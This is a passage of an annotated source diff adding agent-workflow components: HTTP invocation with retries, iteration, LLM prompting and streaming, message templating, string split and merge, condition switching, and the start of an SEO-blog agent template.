                    if self._param.datatype.lower() == 'json':
                        response = requests.put(url=url,
                                                json=args,
                                                headers=headers,
                                                proxies=proxies,
                                                timeout=self._param.timeout)
                    else:
                        response = requests.put(url=url,
                                                data=args,
                                                headers=headers,
                                                proxies=proxies,
                                                timeout=self._param.timeout)
                    if self._param.clean_html:
                        sections = HtmlParser()(None, response.content)
                        self.set_output("result", "\n".join(sections))
                    else:
                        self.set_output("result", response.text)

                if method == 'post':
                    if self._param.datatype.lower() == 'json':
                        response = requests.post(url=url,
                                                 json=args,
                                                 headers=headers,
                                                 proxies=proxies,
                                                 timeout=self._param.timeout)
                    else:
                        response = requests.post(url=url,
                                                 data=args,
                                                 headers=headers,
                                                 proxies=proxies,
                                                 timeout=self._param.timeout)
                    if self._param.clean_html:
                        # Parse the HTML response into text sections before joining.
                        sections = HtmlParser()(None, response.content)
                        self.set_output("result", "\n".join(sections))
                    else:
                        self.set_output("result", response.text)

                return self.output("result")
            except Exception as e:
                last_e = e
                logging.exception(f"Http request error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Http request error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return "Waiting for the server to respond..."
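The retry loop above re-issues the whole request after `delay_after_error` seconds and only records `_ERROR` once every attempt has failed. A compact, hypothetical rendering of that pattern:

# Hypothetical sketch of the retry-with-delay pattern in Invoke._invoke above.
import time

def with_retries(do_request, max_retries: int = 2, delay: float = 2.0):
    last_e = None
    for _ in range(max_retries + 1):  # one initial attempt plus max_retries retries
        try:
            return do_request()
        except Exception as e:
            last_e = e
            time.sleep(delay)
    return f"Http request error: {last_e}"  # surfaced instead of raised, as above

attempts = []
def flaky():
    attempts.append(1)
    if len(attempts) < 2:
        raise IOError("connection reset")
    return "ok"

print(with_retries(flaky, delay=0.01))  # "ok" on the second attempt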
agent/component/iteration.py (new file)
@@ -0,0 +1,60 @@
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); full header as in agent/component/base.py above.

from abc import ABC
from agent.component.base import ComponentBase, ComponentParamBase


class IterationParam(ComponentParamBase):
    """
    Define the Iteration component parameters.
    """

    def __init__(self):
        super().__init__()
        self.items_ref = ""

    def get_input_form(self) -> dict[str, dict]:
        return {
            "items": {
                "type": "json",
                "name": "Items"
            }
        }

    def check(self):
        return True


class Iteration(ComponentBase, ABC):
    component_name = "Iteration"

    def get_start(self):
        for cid in self._canvas.components.keys():
            if self._canvas.get_component(cid)["obj"].component_name.lower() != "iterationitem":
                continue
            if self._canvas.get_component(cid)["parent_id"] == self._id:
                return cid

    def _invoke(self, **kwargs):
        arr = self._canvas.get_variable_value(self._param.items_ref)
        if not isinstance(arr, list):
            self.set_output("_ERROR", self._param.items_ref + " must be an array, but its type is " + str(type(arr)))

    def thoughts(self) -> str:
        return "Need to process {} items.".format(len(self._canvas.get_variable_value(self._param.items_ref)))
agent/component/iterationitem.py (new file)
@@ -0,0 +1,83 @@
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); full header as in agent/component/base.py above.

from abc import ABC
from agent.component.base import ComponentBase, ComponentParamBase


class IterationItemParam(ComponentParamBase):
    """
    Define the IterationItem component parameters.
    """
    def check(self):
        return True


class IterationItem(ComponentBase, ABC):
    component_name = "IterationItem"

    def __init__(self, canvas, id, param: ComponentParamBase):
        super().__init__(canvas, id, param)
        self._idx = 0

    def _invoke(self, **kwargs):
        parent = self.get_parent()
        arr = self._canvas.get_variable_value(parent._param.items_ref)
        if not isinstance(arr, list):
            self._idx = -1
            raise Exception(parent._param.items_ref + " must be an array, but its type is " + str(type(arr)))

        if self._idx > 0:
            self.output_collation()

        if self._idx >= len(arr):
            self._idx = -1
            return

        self.set_output("item", arr[self._idx])
        self.set_output("index", self._idx)

        self._idx += 1

    def output_collation(self):
        pid = self.get_parent()._id
        for cid in self._canvas.components.keys():
            obj = self._canvas.get_component_obj(cid)
            p = obj.get_parent()
            if not p:
                continue
            if p._id != pid:
                continue

            if p.component_name.lower() in ["categorize", "message", "switch", "userfillup", "iterationitem"]:
                continue

            for k, o in p._param.outputs.items():
                if "ref" not in o:
                    continue
                _cid, var = o["ref"].split("@")
                if _cid != cid:
                    continue
                res = p.output(k)
                if not res:
                    res = []
                res.append(obj.output(var))
                p.set_output(k, res)

    def end(self):
        return self._idx == -1

    def thoughts(self) -> str:
        return "Next turn..."
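Each call to `IterationItem._invoke` emits one element and advances `_idx`, with `-1` doubling as the exhausted flag that `end()` checks. A toy version of that stateful cursor:

# Toy sketch of the stateful cursor used by IterationItem above:
# each call yields the next element; _idx == -1 marks exhaustion.
class Cursor:
    def __init__(self, items):
        self.items, self._idx = items, 0

    def step(self):
        if self._idx >= len(self.items):
            self._idx = -1  # exhausted: end() will report True
            return None
        item, self._idx = self.items[self._idx], self._idx + 1
        return item

    def end(self) -> bool:
        return self._idx == -1

c = Cursor(["a", "b"])
while not c.end():
    item = c.step()
    if item is not None:
        print(item)  # a, b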
agent/component/llm.py (new file)
@@ -0,0 +1,269 @@
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); full header as in agent/component/base.py above.

import json
import logging
import os
import re
from typing import Any

import json_repair
from copy import deepcopy
from functools import partial

from api.db import LLMType
from api.db.services.llm_service import LLMBundle, TenantLLMService
from agent.component.base import ComponentBase, ComponentParamBase
from api.utils.api_utils import timeout
from rag.prompts import message_fit_in, citation_prompt
from rag.prompts.prompts import tool_call_summary


class LLMParam(ComponentParamBase):
    """
    Define the LLM component parameters.
    """

    def __init__(self):
        super().__init__()
        self.llm_id = ""
        self.sys_prompt = ""
        self.prompts = [{"role": "user", "content": "{sys.query}"}]
        self.max_tokens = 0
        self.temperature = 0
        self.top_p = 0
        self.presence_penalty = 0
        self.frequency_penalty = 0
        self.output_structure = None
        self.cite = True
        self.visual_files_var = None

    def check(self):
        self.check_decimal_float(float(self.temperature), "[Agent] Temperature")
        self.check_decimal_float(float(self.presence_penalty), "[Agent] Presence penalty")
        self.check_decimal_float(float(self.frequency_penalty), "[Agent] Frequency penalty")
        self.check_nonnegative_number(int(self.max_tokens), "[Agent] Max tokens")
        self.check_decimal_float(float(self.top_p), "[Agent] Top P")
        self.check_empty(self.llm_id, "[Agent] LLM")
        self.check_empty(self.sys_prompt, "[Agent] System prompt")
        self.check_empty(self.prompts, "[Agent] User prompt")

    def gen_conf(self):
        conf = {}

        def get_attr(nm):
            try:
                return getattr(self, nm)
            except Exception:
                pass

        if int(self.max_tokens) > 0 and get_attr("maxTokensEnabled"):
            conf["max_tokens"] = int(self.max_tokens)
        if float(self.temperature) > 0 and get_attr("temperatureEnabled"):
            conf["temperature"] = float(self.temperature)
        if float(self.top_p) > 0 and get_attr("topPEnabled"):
            conf["top_p"] = float(self.top_p)
        if float(self.presence_penalty) > 0 and get_attr("presencePenaltyEnabled"):
            conf["presence_penalty"] = float(self.presence_penalty)
        if float(self.frequency_penalty) > 0 and get_attr("frequencyPenaltyEnabled"):
            conf["frequency_penalty"] = float(self.frequency_penalty)
        return conf


class LLM(ComponentBase):
    component_name = "LLM"

    def __init__(self, canvas, id, param: ComponentParamBase):
        super().__init__(canvas, id, param)
        self.chat_mdl = LLMBundle(self._canvas.get_tenant_id(), TenantLLMService.llm_id2llm_type(self._param.llm_id),
                                  self._param.llm_id, max_retries=self._param.max_retries,
                                  retry_interval=self._param.delay_after_error
                                  )
        self.imgs = []

    def get_input_form(self) -> dict[str, dict]:
        res = {}
        for k, v in self.get_input_elements().items():
            res[k] = {
                "type": "line",
                "name": v["name"]
            }
        return res

    def get_input_elements(self) -> dict[str, Any]:
        res = self.get_input_elements_from_text(self._param.sys_prompt)
        for prompt in self._param.prompts:
            d = self.get_input_elements_from_text(prompt["content"])
            res.update(d)
        return res

    def set_debug_inputs(self, inputs: dict[str, dict]):
        self._param.debug_inputs = inputs

    def add2system_prompt(self, txt):
        self._param.sys_prompt += txt

    def _prepare_prompt_variables(self):
        if self._param.visual_files_var:
            self.imgs = self._canvas.get_variable_value(self._param.visual_files_var)
            if not self.imgs:
                self.imgs = []
            self.imgs = [img for img in self.imgs if img[:len("data:image/")] == "data:image/"]
        if self.imgs and TenantLLMService.llm_id2llm_type(self._param.llm_id) == LLMType.CHAT.value:
            self.chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.IMAGE2TEXT.value,
                                      self._param.llm_id, max_retries=self._param.max_retries,
                                      retry_interval=self._param.delay_after_error
                                      )

        args = {}
        vars = self.get_input_elements() if not self._param.debug_inputs else self._param.debug_inputs
        prompt = self._param.sys_prompt
        for k, o in vars.items():
            args[k] = o["value"]
            if not isinstance(args[k], str):
                try:
                    args[k] = json.dumps(args[k], ensure_ascii=False)
                except Exception:
                    args[k] = str(args[k])
            self.set_input_value(k, args[k])

        msg = self._canvas.get_history(self._param.message_history_window_size)[:-1]
        msg.extend(deepcopy(self._param.prompts))
        prompt = self.string_format(prompt, args)
        for m in msg:
            m["content"] = self.string_format(m["content"], args)
        if self._canvas.get_reference()["chunks"]:
            prompt += citation_prompt()

        return prompt, msg

    def _generate(self, msg: list[dict], **kwargs) -> str:
        if not self.imgs:
            return self.chat_mdl.chat(msg[0]["content"], msg[1:], self._param.gen_conf(), **kwargs)
        return self.chat_mdl.chat(msg[0]["content"], msg[1:], self._param.gen_conf(), images=self.imgs, **kwargs)

    def _generate_streamly(self, msg: list[dict], **kwargs):
        ans = ""
        last_idx = 0
        endswith_think = False

        def delta(txt):
            nonlocal ans, last_idx, endswith_think
            delta_ans = txt[last_idx:]
            ans = txt

            if delta_ans.find("<think>") == 0:
                last_idx += len("<think>")
                return "<think>"
            elif delta_ans.find("<think>") > 0:
                delta_ans = txt[last_idx:last_idx + delta_ans.find("<think>")]
                last_idx += delta_ans.find("<think>")
                return delta_ans
            elif delta_ans.endswith("</think>"):
                endswith_think = True
            elif endswith_think:
                endswith_think = False
                return "</think>"

            last_idx = len(ans)
            if ans.endswith("</think>"):
                last_idx -= len("</think>")
            return re.sub(r"(<think>|</think>)", "", delta_ans)

        if not self.imgs:
            for txt in self.chat_mdl.chat_streamly(msg[0]["content"], msg[1:], self._param.gen_conf(), **kwargs):
                yield delta(txt)
        else:
            for txt in self.chat_mdl.chat_streamly(msg[0]["content"], msg[1:], self._param.gen_conf(), images=self.imgs, **kwargs):
                yield delta(txt)

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        def clean_formated_answer(ans: str) -> str:
            ans = re.sub(r"^.*</think>", "", ans, flags=re.DOTALL)
            ans = re.sub(r"^.*```json", "", ans, flags=re.DOTALL)
            return re.sub(r"```\n*$", "", ans, flags=re.DOTALL)

        prompt, msg = self._prepare_prompt_variables()
        error = ""

        if self._param.output_structure:
            prompt += "\nThe output MUST follow this JSON format:\n" + json.dumps(self._param.output_structure, ensure_ascii=False, indent=2)
            prompt += "\nRedundant information is FORBIDDEN."
            for _ in range(self._param.max_retries + 1):
                _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
                error = ""
                ans = self._generate(msg)
                msg.pop(0)
                if ans.find("**ERROR**") >= 0:
                    logging.error(f"LLM response error: {ans}")
                    error = ans
                    continue
                try:
                    self.set_output("structured_content", json_repair.loads(clean_formated_answer(ans)))
                    return
                except Exception:
                    msg.append({"role": "user", "content": "The answer can't be parsed as JSON"})
                    error = "The answer can't be parsed as JSON"
            if error:
                self.set_output("_ERROR", error)
            return

        downstreams = self._canvas.get_component(self._id)["downstream"] if self._canvas.get_component(self._id) else []
        ex = self.exception_handler()
        if any([self._canvas.get_component_obj(cid).component_name.lower() == "message" for cid in downstreams]) and not self._param.output_structure and not (ex and ex["goto"]):
            self.set_output("content", partial(self._stream_output, prompt, msg))
            return

        for _ in range(self._param.max_retries + 1):
            _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
            error = ""
            ans = self._generate(msg)
            msg.pop(0)
            if ans.find("**ERROR**") >= 0:
                logging.error(f"LLM response error: {ans}")
                error = ans
                continue
            self.set_output("content", ans)
            break

        if error:
            if self.get_exception_default_value():
                self.set_output("content", self.get_exception_default_value())
            else:
                self.set_output("_ERROR", error)

    def _stream_output(self, prompt, msg):
        _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
        answer = ""
        for ans in self._generate_streamly(msg):
            if ans.find("**ERROR**") >= 0:
                if self.get_exception_default_value():
                    self.set_output("content", self.get_exception_default_value())
                    yield self.get_exception_default_value()
                else:
                    self.set_output("_ERROR", ans)
                return
            yield ans
            answer += ans
        self.set_output("content", answer)

    def add_memory(self, user: str, assist: str, func_name: str, params: dict, results: str):
        summ = tool_call_summary(self.chat_mdl, func_name, params, results)
        logging.info(f"[MEMORY]: {summ}")
        self._canvas.add_memory(user, assist, summ)

    def thoughts(self) -> str:
        _, msg = self._prepare_prompt_variables()
        return "⌛Give me a moment—starting from: \n\n" + re.sub(r"(User's query:|[\\]+)", '', msg[-1]['content'], flags=re.DOTALL) + "\n\nI’ll figure out our best next move."
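`_generate_streamly` converts cumulative snapshots from `chat_streamly` into per-chunk deltas while passing `<think>`/`</think>` markers through exactly once. A simplified sketch of just the snapshot-to-delta step, without the think-tag bookkeeping:

# Simplified sketch of the snapshot-to-delta conversion in _generate_streamly above
# (the real code also tracks <think>/</think> markers).
def to_deltas(snapshots):
    last = ""
    for snap in snapshots:      # chat_streamly yields growing prefixes of the answer
        yield snap[len(last):]  # emit only the newly generated tail
        last = snap

print(list(to_deltas(["He", "Hello", "Hello world"])))  # ['He', 'llo', ' world']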
agent/component/message.py (new file)
@@ -0,0 +1,146 @@
|
|||||||
|
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import random
import re
from functools import partial
from typing import Any

from agent.component.base import ComponentBase, ComponentParamBase
from jinja2 import Template as Jinja2Template

from api.utils.api_utils import timeout


class MessageParam(ComponentParamBase):
    """
    Define the Message component parameters.
    """
    def __init__(self):
        super().__init__()
        self.content = []
        self.stream = True
        self.outputs = {
            "content": {
                "type": "str"
            }
        }

    def check(self):
        self.check_empty(self.content, "[Message] Content")
        self.check_boolean(self.stream, "[Message] stream")
        return True


class Message(ComponentBase):
    component_name = "Message"

    def get_kwargs(self, script: str, kwargs: dict = {}, delimeter: str = None) -> tuple[str, dict[str, str | list | Any]]:
        for k, v in self.get_input_elements_from_text(script).items():
            if k in kwargs:
                continue
            v = v["value"]
            ans = ""
            if isinstance(v, partial):
                for t in v():
                    ans += t
            elif isinstance(v, list) and delimeter:
                ans = delimeter.join([str(vv) for vv in v])
            elif not isinstance(v, str):
                try:
                    ans = json.dumps(v, ensure_ascii=False)
                except Exception:
                    pass
            else:
                ans = v
            if not ans:
                ans = ""
            kwargs[k] = ans
            self.set_input_value(k, ans)

        _kwargs = {}
        for n, v in kwargs.items():
            _n = re.sub("[@:.]", "_", n)
            script = re.sub(r"\{%s\}" % re.escape(n), _n, script)
            _kwargs[_n] = v
        return script, _kwargs
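The second loop in `get_kwargs` exists because component references such as `Agent:LuckyApplesGrab@content` are not legal Jinja2 identifiers: `@`, `:` and `.` must be rewritten in both the script and the kwargs keys before rendering. A minimal sketch of just that step (names in the example are illustrative):

```python
# Sanitize variable names so they become valid template identifiers.
import re

def sanitize(script: str, kwargs: dict[str, str]) -> tuple[str, dict[str, str]]:
    _kwargs = {}
    for n, v in kwargs.items():
        _n = re.sub("[@:.]", "_", n)  # "Agent:X@content" -> "Agent_X_content"
        script = re.sub(r"\{%s\}" % re.escape(n), _n, script)
        _kwargs[_n] = v
    return script, _kwargs

# sanitize("Hi {Agent:X@content}", {"Agent:X@content": "there"})
# -> ("Hi Agent_X_content", {"Agent_X_content": "there"})
```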

    def _stream(self, rand_cnt: str):
        s = 0
        all_content = ""
        cache = {}
        for r in re.finditer(self.variable_ref_patt, rand_cnt, flags=re.DOTALL):
            all_content += rand_cnt[s: r.start()]
            yield rand_cnt[s: r.start()]
            s = r.end()
            exp = r.group(1)
            if exp in cache:
                yield cache[exp]
                all_content += cache[exp]
                continue

            v = self._canvas.get_variable_value(exp)
            if isinstance(v, partial):
                cnt = ""
                for t in v():
                    all_content += t
                    cnt += t
                    yield t
                continue
            elif not isinstance(v, str):
                try:
                    v = json.dumps(v, ensure_ascii=False, indent=2)
                except Exception:
                    v = str(v)
            yield v
            all_content += v
            cache[exp] = v

        if s < len(rand_cnt):
            all_content += rand_cnt[s:]
            yield rand_cnt[s:]

        self.set_output("content", all_content)

    def _is_jinjia2(self, content: str) -> bool:
        patt = [
            r"\{%.*%\}", "{{", "}}"
        ]
        return any([re.search(p, content) for p in patt])

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        rand_cnt = random.choice(self._param.content)
        if self._param.stream and not self._is_jinjia2(rand_cnt):
            self.set_output("content", partial(self._stream, rand_cnt))
            return

        rand_cnt, kwargs = self.get_kwargs(rand_cnt, kwargs)
        template = Jinja2Template(rand_cnt)
        content = rand_cnt  # fall back to the raw script if rendering fails (avoids a NameError below)
        try:
            content = template.render(kwargs)
        except Exception:
            pass

        for n, v in kwargs.items():
            content = re.sub(n, v, content)

        self.set_output("content", content)

    def thoughts(self) -> str:
        return ""
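`Message._stream` interleaves literal template text with resolved variable references and caches each reference so repeated mentions are resolved only once. A self-contained sketch of that generator shape, where `VAR_PATT` and `resolve` are hypothetical stand-ins for the component's `variable_ref_patt` and the canvas lookup:

```python
# Streaming interpolation: yield literal chunks and resolved variables in order.
import re

VAR_PATT = r"\{([A-Za-z0-9_:@.]+)\}"

def stream(text: str, resolve):
    s, cache = 0, {}
    for r in re.finditer(VAR_PATT, text, flags=re.DOTALL):
        yield text[s:r.start()]          # literal chunk before the reference
        s = r.end()
        exp = r.group(1)
        if exp not in cache:             # resolve each reference once
            cache[exp] = str(resolve(exp))
        yield cache[exp]
    if s < len(text):
        yield text[s:]                   # trailing literal chunk

# "".join(stream("Hi {a}, again {a}", {"a": "Bob"}.get)) -> "Hi Bob, again Bob"
```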
100
agent/component/string_transform.py
Normal file
@@ -0,0 +1,100 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
from abc import ABC
from jinja2 import Template as Jinja2Template
from agent.component.base import ComponentParamBase
from api.utils.api_utils import timeout
from .message import Message


class StringTransformParam(ComponentParamBase):
    """
    Define the StringTransform component parameters.
    """

    def __init__(self):
        super().__init__()
        self.method = "split"
        self.script = ""
        self.split_ref = ""
        self.delimiters = [","]
        self.outputs = {"result": {"value": "", "type": "string"}}

    def check(self):
        self.check_valid_value(self.method, "Support method", ["split", "merge"])
        self.check_empty(self.delimiters, "delimiters")


class StringTransform(Message, ABC):
    component_name = "StringTransform"

    def get_input_form(self) -> dict[str, dict]:
        if self._param.method == "split":
            return {
                "line": {
                    "name": "String",
                    "type": "line"
                }
            }
        return {k: {
            "name": o["name"],
            "type": "line"
        } for k, o in self.get_input_elements_from_text(self._param.script).items()}

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        if self._param.method == "split":
            self._split(kwargs.get("line"))
        else:
            self._merge(kwargs)

    def _split(self, line: str | None = None):
        var = self._canvas.get_variable_value(self._param.split_ref) if not line else line
        if not var:
            var = ""
        assert isinstance(var, str), "The input variable is not a string: {}".format(type(var))
        self.set_input_value(self._param.split_ref, var)
        res = []
        # re.split with a capturing group keeps the delimiters at odd indices; skip them.
        for i, s in enumerate(re.split(r"(%s)" % ("|".join([re.escape(d) for d in self._param.delimiters])), var, flags=re.DOTALL)):
            if i % 2 == 1:
                continue
            res.append(s)
        self.set_output("result", res)
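The multi-delimiter split above builds one alternation pattern from all delimiters; because the pattern is wrapped in a capturing group, `re.split` returns the delimiters themselves at the odd indices, which the loop discards. A worked example:

```python
# Splitting on several delimiters at once while dropping the delimiters.
import re

delimiters = [",", ";"]
patt = r"(%s)" % "|".join(re.escape(d) for d in delimiters)
parts = re.split(patt, "a,b;c", flags=re.DOTALL)
# parts == ["a", ",", "b", ";", "c"]
pieces = [s for i, s in enumerate(parts) if i % 2 == 0]
# pieces == ["a", "b", "c"]
```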

    def _merge(self, kwargs: dict[str, str] = {}):
        script = self._param.script
        script, kwargs = self.get_kwargs(script, kwargs, self._param.delimiters[0])

        if self._is_jinjia2(script):
            template = Jinja2Template(script)
            try:
                script = template.render(kwargs)
            except Exception:
                pass

        for k, v in kwargs.items():
            if not v:
                v = ""
            script = re.sub(k, v, script)

        self.set_output("result", script)

    def thoughts(self) -> str:
        return f"It's {self._param.method}ing."
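The merge path tries Jinja2 rendering when the script looks like a template, and falls back to plain name substitution for anything left over. A minimal sketch of that two-stage strategy (the regex used for template detection here is an assumption standing in for `_is_jinjia2`):

```python
# Merge variables into a script: Jinja2 first, plain substitution as fallback.
import re
from jinja2 import Template as Jinja2Template

def merge(script: str, kwargs: dict[str, str]) -> str:
    if re.search(r"\{\{.*\}\}|\{%.*%\}", script, flags=re.DOTALL):
        try:
            script = Jinja2Template(script).render(kwargs)
        except Exception:
            pass  # keep the raw script if rendering fails
    for k, v in kwargs.items():
        script = re.sub(k, v or "", script)
    return script

# merge("{{ a }}-{{ b }}", {"a": "x", "b": "y"}) -> "x-y"
```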
131
agent/component/switch.py
Normal file
@@ -0,0 +1,131 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numbers
import os
from abc import ABC
from typing import Any

from agent.component.base import ComponentBase, ComponentParamBase
from api.utils.api_utils import timeout


class SwitchParam(ComponentParamBase):
    """
    Define the Switch component parameters.
    """

    def __init__(self):
        super().__init__()
        """
        {
            "logical_operator" : "and | or"
            "items" : [
                {"cpn_id": "categorize:0", "operator": "contains", "value": ""},
                {"cpn_id": "categorize:0", "operator": "contains", "value": ""},...],
            "to": ""
        }
        """
        self.conditions = []
        self.end_cpn_ids = []
        self.operators = ['contains', 'not contains', 'start with', 'end with', 'empty', 'not empty', '=', '≠', '>',
                          '<', '≥', '≤']

    def check(self):
        self.check_empty(self.conditions, "[Switch] conditions")
        for cond in self.conditions:
            if not cond["to"]:
                raise ValueError("[Switch] 'To' cannot be empty!")
        self.check_empty(self.end_cpn_ids, "[Switch] the ELSE/Other destination cannot be empty.")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "urls": {
                "name": "URLs",
                "type": "line"
            }
        }


class Switch(ComponentBase, ABC):
    component_name = "Switch"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 3))
    def _invoke(self, **kwargs):
        for cond in self._param.conditions:
            res = []
            for item in cond["items"]:
                if not item["cpn_id"]:
                    continue
                cpn_v = self._canvas.get_variable_value(item["cpn_id"])
                self.set_input_value(item["cpn_id"], cpn_v)
                operatee = item.get("value", "")
                if isinstance(cpn_v, numbers.Number):
                    operatee = float(operatee)
                res.append(self.process_operator(cpn_v, item["operator"], operatee))
            if cond["logical_operator"] != "and" and any(res):
                self.set_output("next", [self._canvas.get_component_name(cpn_id) for cpn_id in cond["to"]])
                self.set_output("_next", cond["to"])
                return

            if all(res):
                self.set_output("next", [self._canvas.get_component_name(cpn_id) for cpn_id in cond["to"]])
                self.set_output("_next", cond["to"])
                return

        self.set_output("next", [self._canvas.get_component_name(cpn_id) for cpn_id in self._param.end_cpn_ids])
        self.set_output("_next", self._param.end_cpn_ids)
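The branch selection above implements simple and/or semantics over the per-item results: "and" requires every item to match, while anything else behaves as "or". Isolated as a sketch:

```python
# Condition matching as used by Switch._invoke above.
def condition_matches(results: list[bool], logical_operator: str) -> bool:
    if logical_operator != "and" and any(results):
        return True
    # Note: all([]) is True, so a condition with no valid items matches.
    return all(results)

# condition_matches([True, False], "or")  -> True
# condition_matches([True, False], "and") -> False
```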

    def process_operator(self, input: Any, operator: str, value: Any) -> bool:
        if operator == "contains":
            return value.lower() in input.lower()
        elif operator == "not contains":
            return value.lower() not in input.lower()
        elif operator == "start with":
            return input.lower().startswith(value.lower())
        elif operator == "end with":
            return input.lower().endswith(value.lower())
        elif operator == "empty":
            return not input
        elif operator == "not empty":
            return bool(input)
        elif operator == "=":
            return input == value
        elif operator == "≠":
            return input != value
        elif operator == ">":
            try:
                return float(input) > float(value)
            except Exception:
                return input > value
        elif operator == "<":
            try:
                return float(input) < float(value)
            except Exception:
                return input < value
        elif operator == "≥":
            try:
                return float(input) >= float(value)
            except Exception:
                return input >= value
        elif operator == "≤":
            try:
                return float(input) <= float(value)
            except Exception:
                return input <= value

        raise ValueError("Unsupported operator: " + operator)

    def thoughts(self) -> str:
        return "I’m weighing a few options and will pick the next step shortly."
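A few worked examples of the operator semantics above, assuming string or numeric operands as the component passes them:

```python
# process_operator("Hello World", "contains", "world")  -> True   (case-insensitive)
# process_operator("42", ">", "7")                      -> True   (numeric coercion: 42.0 > 7.0)
# process_operator("abc", ">", "abd")                   -> False  (float() fails, falls back to string comparison)
# process_operator("", "empty", "")                     -> True
```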
18
agent/settings.py
Normal file
@@ -0,0 +1,18 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

FLOAT_ZERO = 1e-8
PARAM_MAXDEPTH = 5
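A plausible use of `FLOAT_ZERO` as an epsilon for float comparison; this is illustrative only and not taken from this diff:

```python
from agent.settings import FLOAT_ZERO

def is_zero(x: float) -> bool:
    # Treat anything within the epsilon as zero.
    return abs(x) < FLOAT_ZERO
```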
798
agent/templates/customer_review_analysis.json
Normal file
File diff suppressed because one or more lines are too long
849
agent/templates/customer_service.json
Normal file
File diff suppressed because one or more lines are too long
881
agent/templates/customer_support.json
Normal file
File diff suppressed because one or more lines are too long
423
agent/templates/cv_analysis_and_candidate_evaluation.json
Normal file
File diff suppressed because one or more lines are too long
917
agent/templates/cv_evaluation.json
Normal file
File diff suppressed because one or more lines are too long
848
agent/templates/deep_research.json
Normal file
File diff suppressed because one or more lines are too long
849
agent/templates/deep_search_r.json
Normal file
File diff suppressed because one or more lines are too long
902
agent/templates/generate_SEO_blog.json
Normal file
@@ -0,0 +1,902 @@
{
"id": 8,
"title": "Generate SEO Blog",
"description": "This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI “writers”, where each agent plays a specialized role — just like a real editorial team.",
"canvas_type": "Agent",
"dsl": {
"components": {
"Agent:LuckyApplesGrab": {
"downstream": [
"Message:ModernSwansThrow"
],
"obj": {
"component_name": "Agent",
"params": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 3,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "The user query is {sys.query}",
"role": "user"
}
],
